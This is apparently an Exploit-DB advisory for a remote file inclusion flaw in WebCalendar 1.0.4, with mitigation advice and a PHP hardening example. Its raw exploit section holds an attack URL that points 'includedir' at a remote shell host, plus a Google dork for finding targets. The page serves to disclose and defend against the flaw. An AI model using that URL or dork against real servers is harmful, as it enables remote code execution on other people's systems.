Vendor: WebCalendar
By: Cr@zy_King
CVSS: 5.5 (MEDIUM)
Type: Remote File Inclusion
CWE: 98
Product Name: WebCalendar
Affected Version From: 1.0.4
Affected Version To: 1.0.4
Patch Exists: NO
Related CWE:
CPE: a:webcalendar:webcalendar:1.0.4
Metasploit:
Other Scripts:
Platforms Tested:
2008

WebCalendar v1.0.4 Remote File Include

This exploit allows an attacker to include remote files in the WebCalendar v1.0.4 application. The vulnerability is triggered by the 'includedir' parameter in the 'send_reminders.php' file. By manipulating this parameter, an attacker can include a malicious file hosted on a remote server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of WebCalendar that addresses this issue. Additionally, input validation should be implemented to prevent the inclusion of remote files.
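
One way to apply the input validation recommended above, as an added example that is not WebCalendar's own code or an official patch. The constant WC_INCLUDE_DIR, the function wc_safe_include_path() and the tools/ beside includes/ layout are assumptions; only the 'includedir' parameter name comes from this page.

```php
<?php
// Added example: not WebCalendar's code. Names below are hypothetical.

// 1. The include directory is a server-side constant, resolved once from this
//    script's own location (assumed layout: tools/ beside includes/).
define('WC_INCLUDE_DIR', realpath(__DIR__ . '/../includes'));

// 2. Refuse any request that supplies the variable named on this page.
//    This matters when register_globals (or an extract()-style import) would
//    otherwise let request data overwrite a global of the same name.
foreach (array($_GET, $_POST, $_COOKIE) as $source) {
    if (array_key_exists('includedir', $source)) {
        header('HTTP/1.1 400 Bad Request');
        exit('Invalid request');
    }
}

/**
 * Map a bare file name to an absolute path inside WC_INCLUDE_DIR.
 * Returns false for anything that is not a plain local .php file there.
 */
function wc_safe_include_path($name)
{
    // Only a simple file name: no slashes, no "..", no scheme or wrapper
    // such as http://, ftp://, php:// or data:.
    if (WC_INCLUDE_DIR === false || !is_string($name)
        || !preg_match('/^[A-Za-z0-9_-]+\.php$/', $name)) {
        return false;
    }
    // realpath() resolves symlinks and fails for missing files; the prefix
    // check then confirms the result is still under the fixed directory.
    $path = realpath(WC_INCLUDE_DIR . DIRECTORY_SEPARATOR . $name);
    $prefix = WC_INCLUDE_DIR . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $path;
}

$config = wc_safe_include_path('config.php');
if ($config === false) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('Configuration not found');
}
require $config;
```

Independently of the application code, keeping allow_url_include = Off in php.ini stops include and require from fetching http:// or ftp:// URLs at all.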
Source

Exploit-DB raw data:

Cr@zy_King :\ BiyoSecurity Team

WebCalendar v1.0.4 Remote File Include

Demo - Down : http://webcalendar.sourceforge.net/

http://localhost/patch/tools/send_reminders.php?noSet=0&includedir=http://sheLLz?

Google Dork : "WebCalendar v1.0.4"

                           www.biyosecurity.com

Greatz : aLL My Friend'Z & nETKILLER

# milw0rm.com [2008-06-17]